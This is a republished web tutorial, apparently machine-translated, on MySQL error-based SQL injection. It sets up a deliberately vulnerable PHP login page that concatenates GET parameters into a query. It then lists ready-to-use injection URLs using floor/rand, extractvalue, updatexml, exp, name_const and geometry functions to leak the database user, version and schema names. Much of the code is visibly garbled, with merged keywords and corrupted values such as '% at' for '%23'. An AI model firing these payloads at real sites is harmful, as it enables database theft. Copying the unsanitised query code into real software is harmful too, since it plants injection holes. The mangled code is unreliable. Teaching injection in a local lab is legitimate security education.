SQL error injection of more than 10 kinds of injection methods

Source: Internet
Author: User
Tags rand sql error

Error injection principle: Due to the conflict between Rand and Group+by, rand () is not a conditional field for order by, nor can it be a conditional field for group by. Floor (rand (0) * *) gets an indeterminate and duplicate value resulting in MySQL error floor: Rounding down, preserving only integral parts, rand (0)-0~1 Local Environment build database test injection posture:
Mysql> Create DatabaseSqli;mysql> Create Table User(IDint( One) not NULLAuto_incrementPrimary Key, namevarchar( -) not NULL, passvarchar( +) not NULL    ); MySQL> Insert  into User(Name, pass)Values('Admin', MD5 ('admin888')), ('Guest', MD5 ('Guest'));

The following files are created at the site root: index.php
<? php$conn=mysql_connect ("localhost", "root", "root");//connection database, account root, password rootif(! $conn) {die ("Connection failed:". Mysql_error ());} mysql_select_db ("Sqli", $conn);//Verify Login Infoif(Isset ($_get[' name '])&&Isset ($_get[' Pass ']) {$name=$_get[' name ']; $pass=MD5 ($_get[' Pass ']); $query="Select *  from User whereName='$name'  andPass='$pass'"; if($result=mysql_query ($query, $conn)) {$row=mysql_fetch_array ($result, MYSQL_ASSOC); if($row) {echo '<Script>Alert'Login successful!');</Script>"; }    } Else{die ("Operation error:".)    Mysql_error ()); }}mysql_close ();?><! DOCTYPE html><Html><Head>    <Title>Login</Title></Head><Body><Center>    <Form method="Get" action="">        <Label>Username:</Label><input type="text"Name="Name" value=""/><Br/>        <Label>Password:</Label><input type="Password" name="Pass" value=""/><Br/>        <input type="Submit" value="Login"/>    </Form></Center></Body></Html>

Index.php's PHP Verification login code is simple:

$name=$_get[' name ']; $pass=MD5 ($_get[' Pass ']); $query="Select *  from User whereName='$name'  andPass='$pass'";

$name parameter is an obvious injection point.

1, through Floor () Error:

http://localhost/index. Php?name='+or+ (Select+1+from (select+ Count (*), concat (User (), 0x7e,floor (rand (0))) x+from+information_schema.tables+group+by+x) a) +%23&pass=1 

# Burst database: Replace the keyword with the one you want to query

http://localhost/index. Php?name='+or+ (select 1 from (SELECT Count (*), Concat ((select (SELECT DISTINCT concat (0x7e,schema_name,0x7e) from Information_schema.schemata LIMIT 0,1)) From Information_schema.tables limit 0,1), floor (rand (0) *) x from Information_schema.tables Group by X) a) +%23&pass =1

2, through Extractvalue () Error:

http://localhost/index. Php?name='+or+extractvalue (1, Concat (User (), 0x7e,version ())) +%23&pass=1

3, through Updatexml () Error:

http://localhost/index. Php?name='+or+updatexml (1,concat (User ( ), 0x7e,version ()), 1) +%23&pass=1

4, through exp () Error: In detail, see: https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/

http://localhost/index. Php?name='+or+exp (~ (SELECT * FROM ( Select User ()) a) +%23&pass=1

5, through the Name_const (for the lower version) error:

http://localhost/index. Php?name='+or+ (SELECT * FROM (select Name_ CONST (Version (), 1), Name_const (version (), 1)) as X) +%23&pass=1

6, through Multipoint (), Multipolygon (), multilinestring (), linestring (), geometrycollection (), Polygon () and other functions of the error:

http//localhost/Index. php?name='+or+multipoint ((SELECT * FROM (SELECT * () () a) b) +%23&pass=1http://localhost/index.php?name= '+or+Multipolygon ((Select *  from(Select *  from(Select Database()) a) (b))+% at&Pass=1http://localhost/Index. php?name='+or+multilinestring ((SELECT * FROM (select User () a) b)) +%23&pass=1http://localhost/index.php? Name='+or+LINESTRING ((Select *  from(Select *  from(Select User()) a) (b))+% at&Pass=1http://localhost/Index. php?name='+or+geometrycollection ((SELECT * FROM (SELECT * () () a) b) +%23&pass=1http://localhost/ Index.php?name='+or+Polygon ((Select *  from(Select *  from(Select User()) a) (b))+% at&Pass=1

SQL error injection of more than 10 kinds of injection methods

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.